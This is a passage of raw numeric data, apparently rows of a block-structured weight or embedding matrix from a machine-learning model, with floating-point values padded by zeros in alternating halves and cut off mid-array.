-0.864413, -0.910358, 0.801957, -1.95189, -0.972723, -1.21003, -0.67964, 0.130227, 1.09733, 0.176463, -0.514259, -0.355506, -1.22066, 0.346918, -0.285534, 1.88585, 0.166253, -2.40732, 0.680006, -0.711498, 0.658677, -0.330327, -2.69763, -3.18395, -0.592807, -3.79946, 0.00861641, -0.917362, 1.33944, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.171358, 0.068605, 1.14928, 0.234316, -4.70365, 1.37581, 0.198473, 0.0832273, 0.819678, -0.339479, 0.29573, -1.42371, -0.0113211, 0.536265, -0.00633912, 0.0248133, -0.605547, 0.0247199, -0.469479, -0.661784, 0.228349, 0.0131695, 0.125972, 0.333957, 1.59128, -0.438937, 0.250153, 0.00279078, 0.155318, 2.35161, 0.212905, -0.0443533, -0.361112, -0.534815, -0.0347611, -0.365633, 0.333822, -0.256212, -0.167313, 0.0215808, 0.453897, 0.055597, 0.111809, -1.69443, -0.654436, -0.176017, -0.630552, -0.0443466, 0.223919, -0.259162, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.102436, -0.673777, 0.500149, -0.000298093, 0.0862572, 0.151607, 0.0609693, -0.0618773, 0.0397015, -0.0851725, -0.173721, -0.192096, 0.18284, 0.0272879, -0.00112374, 0.0110674, 0.146052, -0.140955, 0.0437451, 0.143911, 0.0107347, -0.213025, 0.121274, 0.0072306, 0.418219, 0.121135, 0.0574224, -0.0275107, -0.0928366, -0.258989, 0.159599, -0.106149, -0.0585228, 0.105157, 0.0758396, -0.650588, 0.202809, -0.103471, 0.176099, -0.738084, 0.258335, -0.0189874, -0.0924992, 0.2322, -0.126591, -0.178581, 0.00039869, 0.0121514, -0.0831856, 0.2735, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0774197, -2.7451, 3.42553, -0.244947, -0.0550098, 0.0815293, 0.495664, -0.0738481, 1.63168, -0.295548, -0.357785, -1.98872, 0.281913, -1.25625, 0.00559982, 0.400101, -1.06225, -0.311013, -0.259961, 0.373959, -0.266409, -0.414128, -0.202667, 0.302865, 1.84527, -0.46585, 0.502156, -0.214565, 0.868845, 5.85983, 0.291085, 0.491398, -0.677802, -0.417188, -0.241922, -2.05606, 0.160784, -0.514009, 0.959477, -1.35559, 1.55644, 1.10811, -0.0487294, -1.6051, -1.47092, -0.574466, -0.927018, -0.0396964, -0.509766, -1.16949, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.046582, -1.36682, 0.634261, 0.172802, 0.109347, -0.994556, -0.0438956, -0.468121, -0.598498, -0.0573191, -0.234072, 0.00892677, -0.0972811, 0.454366, 0.0279091, -0.0208092, 0.210291, 0.19857, 0.0209483, 0.0418835, 0.150229, 0.329987, 0.0137503, 0.356586, 0.644434, 0.0979573, -0.228731, -0.292858, 0.440465, -0.886745, -0.858721, 0.148076, 0.0352383, 0.248951, 0.0392912, -1.10604, -0.0060463, -0.0823404, -0.0501576, 0.077925, 0.00505458, -0.178437, -0.729749, 0.158685, 0.541662, 0.28571, -0.459632, 0.000601673, 0.233931, 0.174393, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.270405, -0.829149, 1.11758, 0.081221, -0.213066, -1.99366, 0.32159, 0.187833, 0.239155, -0.141487, -0.110184, -0.0375693, -0.106668, -1.18214, -0.00514384, 0.0860025, -0.271834, 0.092741, -0.293195, -0.358042, 0.184654, -0.0020673, 0.0907337, 0.308337, 0.332075, -0.291232, 0.125674, -0.323324, 0.258996, -2.3649, -0.441389, 0.824422, -0.81726, -0.34371, 0.350233, 0.747314, 0.933611, 0.0261506, -3.34746, 1.98303, 0.551805, -0.635112, -0.771644, -0.562914, 0.906002, 0.314297, 0.185499, 0.0344345, -0.38472, -0.437223, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.375018, -0.162315, -0.794787, -0.154189, -0.821326, 1.46429, 0.339034, 0.00510719, -2.10812, 0.572136, 1.78536, -4.56312, 0.384742, 0.442119, 0.00392625, -0.401244, 0.108877, 0.488515, 0.189299, -5.63086, 2.38409, 0.282051, -5.19832, -2.47684, -3.02491, -1.70558, 0.754756, -0.33536, 3.11846, -1.74678, 0.22765, -2.07083, 0.579001, -0.0605323, -0.146367, 0.159787, 3.53479, -2.56463, -0.179804, 0.117535, -4.1629, -3.73295, -0.0620882, 0.991151, -4.80972, -2.07371, 1.64255, -0.012875, -0.255455, -0.0183709, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.105, -1.21279, -0.550133, 0.587044, -0.561154, -1.41796, -0.0151146, -1.68799, 0.416801, 0.491335, 0.335962, 0.657415, -1.6444, -3.11174, 0.01377, 0.536977, -6.21949, 0.631763, -2.62169, -3.26036, -0.931337, -0.611045, -2.70202, 0.910757, 0.309714, -5.28894, 0.0779545, -0.148157, 0.839103, -1.69264, -0.338113, -0.446136, -0.170762, -0.675154, 0.0128516, 0.331579, -1.14823, 1.27874, -1.06469, -0.887167, 1.38621, 0.603451, -0.262868, -1.6475, -3.68424, 0.342282, -0.76182, -0.036202, -1.18587, -1.86409, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.136729, -0.741291, 0.875438, 0.100066, 0.0856765, -0.795403, 0.169397, -0.812254, -1.23112, 0.010297, 0.217381, -0.933369, -0.0702935, 0.013338, 0.00576595, 0.0197882, 0.156158, 0.0407111, -0.198986, -0.224917, 0.336341, 0.0385615, -0.175373, 0.14262, 0.0536719, 0.170501, -0.16552, -0.221205, 0.239687, -1.26225, 0.55195, -0.131762, -0.0310874, 0.266559, -0.157395, -0.707253, 0.514812, -0.210342, -0.330456, -2.36275, 0.201667, -0.20727, -0.739384, 0.0787498, 0.201332, 0.0920677, -0.0304882, 0.0154209, -0.0906038, 0.231536, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0179265, 0.110244, -0.184169, -0.051578, -0.469853, -0.715075, 0.346427, 0.35272, 0.133069, -0.390527, -0.101468, 0.0215436, 0.281866, 0.0353315, -0.0175584, -0.0359271, -0.0887463, 0.0230088, 0.205113, 0.111073, -0.329907, 0.0513832, 0.0176968, 0.0737438, -0.385353, -0.0558639, -0.00790535, -0.137637, 0.786228, -0.0460677, -0.0221184, -0.039664, 0.0593279, -0.109488, 0.310946, 0.0635534, -0.151848, -0.273791, -0.135939, 0.402131, -0.235028, 0.089925, -0.0996393, 0.233086, -0.135764, -0.258497, 0.323289, -0.0524728, 0.278815, 0.00683642, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.375566, 0.247807, 0.831821, -1.12053, -2.11613, -1.0543, 0.283563, 0.61205, -0.0472907, -0.711134, -0.257875, -0.019283, 0.119742, -0.760713, 0.0474915, -0.0474871, 0.0493281, 0.139764, 1.18827, -0.227389, -0.00449563, 0.0456736, 0.0100633, 0.146433, 1.02221, 0.288806, 0.852759, -0.128098, 0.719597, -14.5676, 0.674768, 0.918406, -0.384799, -0.363232, 0.545398, -0.763458, -1.2973, 0.284676, 0.432715, 1.02346, -0.751607, 0.299207, -1.79316, 0.948724, 1.01858, -0.191123, -0.828233, 0.00784095, 0.20676, 0.948392, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00973395, -0.387155, -0.201139, 0.0376793, -0.200139, -0.871053, 0.023216, -0.24786, -0.250708, 0.0745393, 0.369554, -0.0588371, -0.130774, -0.103141, -0.020654, 0.23807, -0.254392, -0.0973468, -0.0332587, -0.598218, -0.137651, -0.243489, 0.0534477, 0.215411, -0.614835, -0.154995, 0.253653, -0.12799, 0.0917628, -1.27155, 0.175456, -1.8799, -0.0521756, -0.0721364, -0.0183898, -0.462464, -0.00538975, 0.252473, 0.283554, -0.0781041, -0.0559165, 0.265362, -0.469358, 0.0279549, 0.0270452, -0.345733, -0.301588, 0.028316, -0.104835, -0.114599, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0099361, -0.331624, 0.103244, 0.020101, 0.0195166, -0.626204, -0.0677506, -0.183717, -0.462329, -0.0172648, -0.223951, 0.104575, 0.137081, -0.0645249, -0.0321693, -0.0308815, 0.0913012, 0.0205079, 0.07841, 0.339859, 0.141636, -0.0166765, -0.0522053, 0.06679, 0.361456, 0.0851553, -0.0377332, 0.0843677, -0.0488038, 0.98501, -0.166458, -0.393216, -0.222361, 0.0564164, -0.0125725, 0.0991278, -0.130699, 0.0497134, -0.0816864, -0.06902, 0.017393, -0.300508, -0.103713, 0.0500856, -0.0608127, -0.0131173, 0.0341953, -0.0179829, 0.0364847, 0.0363857, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.542716, -0.284881, -4.30196, -0.277912, 0.114021, 1.07453, -0.871149, -1.18792, 0.829937, 0.0484451, 0.0216223, -0.444421, -2.11127, -0.0648553, -0.0310061, -0.20009, 0.121138, -0.445219, -0.620692, -0.0349218, 0.0398946, -1.52526, 0.137949, 0.0154275, 0.949853, 0.0692926, 0.202533, 0.161118, 0.957416, 0.0032005, -0.996851, 0.53255, 0.0847795, -0.527421, -0.142959, 0.0278537, 0.411195, -0.705621, -0.546245, -1.66322, 0.249793, 0.0822396, -0.355072, -0.593246, -0.974054, -0.0673341, -0.533659, -0.0284988, 0.503378, 0.213124, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0937429, -0.614771, 0.574087, -0.995807, -0.279647, 0.114052, -0.0774811, 0.0590707, -0.476187, 0.0294036, -0.193339, -0.381636, 0.0440694, -0.236013, -0.0314724, 0.0559882, -0.063382, -0.000428932, -0.0699201, -0.0230933, -0.096574, -0.169848, -0.0198844, -0.00418925, 0.133805, -0.0688685, -0.0952642, -0.0445876, -0.110481, 0.548486, -9.38674, 0.270117, -0.0331187, -0.0189313, -0.00150144, -0.658235, 0.388079, -0.0149576, 0.128336, -0.627472, 0.00717125, 0.0780303, -0.288807, -0.148744, -0.155975, -0.14319, -0.0672474, -0.0190112, -0.103504, -0.320199, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.854777, -0.804487, 3.86719, 0.427518, 0.443657, -0.887188, -0.0599435, -2.72807, 3.73308, -0.247997, 3.25671, -0.915271, -0.813812, 0.473852, 0.00176869, -0.227941, 0.00803855, 0.309495, -1.22599, 2.36919, 0.313498, 0.696946, -0.495688, 0.0548642, 5.03274, 0.314784, -1.28138, -0.795324, -15.2996, 1.46633, 1.88726, 0.217677, 0.156062, 0.390813, 0.57327, -2.48782, -1.56245, 2.00359, 0.329996, 4.87211, -2.94628, -1.28871, -1.07984, 0.728982, -1.54083, 0.0876284, 2.91228, 0.00152962, -0.226068, 0.944708, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0603471, 0.884705, 2.42111, 0.270771, 0.00966464, -0.0611919, 0.596101, 0.155451, 2.2376, -0.133937, 0.012803, -0.461751, -0.265171, -0.113588, -0.0241218, 0.23832, -0.18562, -0.131358, -0.153198, 0.280668, -0.123442, 0.00403498, 0.15714, 0.0275949, 1.07377, -0.286675, -0.23692, -0.155615, -0.465769, 2.37829, 0.216574, 0.0867811, 0.0479979, 0.0344449, 0.0605079, -0.596257, 0.545714, 0.307647, 0.0465394, -1.01244, 0.161261, -0.0496996, 0.149079, -0.0379314, 0.0885242, -0.155845, 0.124564, 0.00962962, 0.425885, -0.1531, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.109546, -0.687897, 0.415421, -0.216894, 0.128069, 0.183706, 0.205175, 0.0265236, -0.0508679, -0.0169715, -0.13148, 0.0801082, -0.0169388, 0.132084, 0.016313, 0.0337704, 0.0629529, 0.136747, 0.105605, -0.626045, 0.0660877, 0.114989, 0.197466, 0.163532, -0.131197, 0.0944511, -0.131388, -0.191837, 0.0961356, 0.0892717, -1.9684, -0.113729, 0.0805298, 0.0406929, 0.0469088, -0.70717, -0.300784, -0.00430995, -0.0148604, 0.0580635, 0.234681, 0.0253711, -0.129839, 0.238674, 0.274998, 0.188001, -0.0525955, -0.00458653, -0.0746666, 0.0963384, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.418294, -1.40829, -2.72308, -0.236537, -0.269111, 0.390895, -0.249988, 1.0942, -4.78285, -0.356567, 0.050688, 0.171199, -0.187532, -0.0608907, 0.0397453, -0.169937, 0.363912, 0.277519, 0.818219, 0.548657, 0.363706, -0.163131, 0.373368, 0.206227, -0.38568, 0.636599, 0.192114, -0.0662641, -0.718695, -2.0209, 0.215237, 0.199808, -0.400015, 0.175947, 0.17355, -0.0503755, -0.70112, 0.347612, 0.359963, -3.57123, 0.227674, -0.4368, -0.039812, 0.315058, -0.472108, 0.622114, -0.568403, -0.0413331, 0.114776, 0.142896, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.233909, -0.242613, -0.0361945, 0.284611, 0.236274, 0.674884, 0.611067, 1.02005, -0.503001, 0.619844, -0.461034, 0.893672, -0.727651, 0.241604, 0.0508817, 0.338783, -0.913141, -0.376204, -1.35445, -0.710616, -1.16109, -0.25656, -0.117938, 0.24832, -0.994423, -1.35811, 0.637893, -0.0321529, -2.85521, 0.458857, 0.468812, -0.589555, 0.308018, 0.0244781, 0.160839, 0.416378, -1.95768, -1.08449, 0.457028, -0.885686, -0.890147, -10.6989, 0.181482, -2.6592, -1.39695, -2.62168, -0.583579, -0.0408955, -1.33666, -0.331785, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.19239, -0.879008, 1.01191, -0.231684, -0.015137, -0.305066, -0.884859, -0.264138, 2.70586, -0.192166, -0.0542771, -0.302712, 0.431669, 0.500803, 0.00558784, -0.0634604, 0.458905, -0.161579, -0.235579, -0.724697, -0.111262, 0.0244568, 0.630016, 0.33828, 0.828814, -0.0349925, -0.0919217, -0.0546509, -2.37028, 1.89336, -0.0775442, -0.0491432, -1.24378, 0.204948, 0.0713037, 0.123239, 0.913009, 0.594945, -0.224259, -1.03031, -1.6376, 2.31807, 0.180508, 0.0163787, 0.142455, -0.636434, 0.48348, 0.0402966, -0.291227, 0.876066, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1694, -1.03, 0.5938, -0.3384, 0.2092, 0.2175, 0.2827, 0.1641, 0.847, -0.7095, 0.3557, 0.008514, 0.2302, 0.6133, -0.002104, -0.0725, 0.1295, -0.1635, -0.0986, -0.605, -0.1353, -0.4526, 0.4468, -0.4412, -0.02974, 0.204, 0.0839, -0.535, 0.732, -1.131, -0.1063, 0.165, -0.00496, -0.2052, 0.02528, -0.51, -0.1176, -0.01218, 0.08527, -0.84, 0.177, 0.592, -0.445, 0.727, 0.4731, -0.578, 0.09357, -0.01588, 0.2712, 0.6606], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1436, 0.1572, 2.1, 0.2917, -0.6465, -0.2045, 1.704, -0.09094, 2.713, -0.3738, 0.778, -0.0737, 0.3477, -0.2788, 0.0363, -0.2053, -2.195, -0.4368, 1.333, 0.4792, -2.03, -0.598, -0.2935, -0.3596, -2.79, -2.066, -0.5864, -0.3882, -0.1605, -5.223, -0.0545, 0.0295, -0.0245, -0.917, 0.5312, 0.6313, 2.125, 0.7764, 0.3367, 0.8994, 1.062, 1.102, 1.541, 2.059, 1.534, -0.1753, 0.09656, -0.00813, -0.1935, -0.996], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0012, -0.2546, 0.2028, -0.03143, -0.1406, 0.49, -0.1117, 0.516, 0.1631, 0.317, -0.2108, -0.1576, -0.0945, -0.34, 0.03137, 0.04404, 0.05426, 0.0656, 0.414, -0.172, -0.12463, 0.0786, -0.09735, 0.06143, -0.1829, -0.258, -0.09534, -0.0712, 0.276, -5.66, -2.61, 0.07263, -0.0692, -0.10254, 0.1156, -0.2124, -0.3662, -0.009094, -0.1335, -0.1119, 0.04703, 0.224, -0.1334, 0.1566, 0.4001, 0.0484, -0.3052, 0.002058, -0.1948, -0.7197], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5127, -1.555, 3.809, -0.6694, -0.595, -3.354, -0.9517, -2.334, 6.156, 0.01255, 0.623, -1.9, 0.6387, -3.332, -0.0312, -0.3242, -2.49, 0.862, -1.338, -4.227, -0.8477, -0.1059, -0.33, 1.7705, 2.705, 1.431, -1.208, -0.2311, -1.138, 9.47, -0.672, 0.004467, -0.1378, -0.5938, -0.4226, -1.767, 1.66, 0.7554, 2.102, -1.276, 1.588, -2.781, 0.3618, -2.002, -0.779, 1.236, 0.7886, 0.03864, -0.2036, -2.717], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1562, 0.113, -2.695, -0.0929, -0.11426, -2.395, -0.0322, 0.3528, -0.2218, -0.02086, -0.394, -0.09924, 0.09125, -0.2172, -0.01674, -0.1992, -0.031, 0.1678, 0.02995, 0.2822, -0.8867, -0.0472, 0.0112, 0.726, 0.1853, 0.11945, 0.01122, -0.096, 0.2191, 0.321, -0.06088, -0.3591, 0.10065, -0.171, 0.01216, 0.329, -1.371, 0.507, 0.02184, 0.3474, -0.3667, 0.1842, -0.09863, -0.1148, -0.341, -0.4128, -4.215, 0.02826, 0.362, -2.275], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.01811, -0.688, 0.3557, -0.1586, 0.03268, -0.7046, -0.07465, -0.1877, 0.3184, -0.4697, 0.02899, -0.1947, 0.3992, 0.1786, -0.01234, 0.08234, 0.11847, -0.598, -0.03583, 0.03583, 0.2433, -0.4336, 0.448, -0.04855, -0.1567, 0.1048, 0.142, -0.179, 0.623, -0.3718, 0.1635, -0.0923, -0.0567, -0.0822, 0.03284, -0.5015, 0.2032, -0.0963, 0.05737, -1.55, 0.2578, 0.2256, -0.2012, 0.3645, -0.00999, -0.986, 0.01828, -0.02368, -0.0723, 0.447], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 